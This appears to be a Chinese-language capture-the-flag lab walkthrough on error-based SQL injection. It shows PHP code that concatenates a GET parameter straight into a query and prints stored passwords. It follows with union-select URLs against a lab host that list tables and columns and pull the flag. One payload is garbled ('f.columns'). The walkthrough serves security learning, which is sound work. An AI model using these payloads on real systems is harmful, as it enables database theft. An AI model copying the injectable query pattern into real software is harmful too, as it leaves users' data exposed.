$username='';$password='';
@$id=$_GET['id'];
@$sql='select *from user where id='.$id;mysqli_select_db($conn,'****');// 不想让你们知道库名$result=mysqli_query($conn,$sql);while($row=mysqli_fetch_array($result)){
$username=$row['username'];$password=$row['password'];}echo'Your Login name:'.$username;echo'Your Password:'.$password;
显错注入、先判断多少个字段
查表拓展: 1 and exists(select * from user)这种形式可以猜解表是否存在
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();
查flag表中字段
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from f.columns where table_schema=database() and table_name=0x6572726f725f666c6167; //0x6572726f725f666c6167是error_flag的十六进制
拿flag //后面就不截图了
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;
pass-02
$username='';$password='';
@$id=$_GET['id'];
@$sql='select *from user where id='\''.$id.'\'';mysqli_select_db($conn,'****');// 不想让你们知道库名$result=mysqli_query($conn,$sql);while($row=mysqli_fetch_array($result)){
$username=$row['username'];$password=$row['password'];}echo'Your Login name:'.$username;echo'Your Password:'.$password;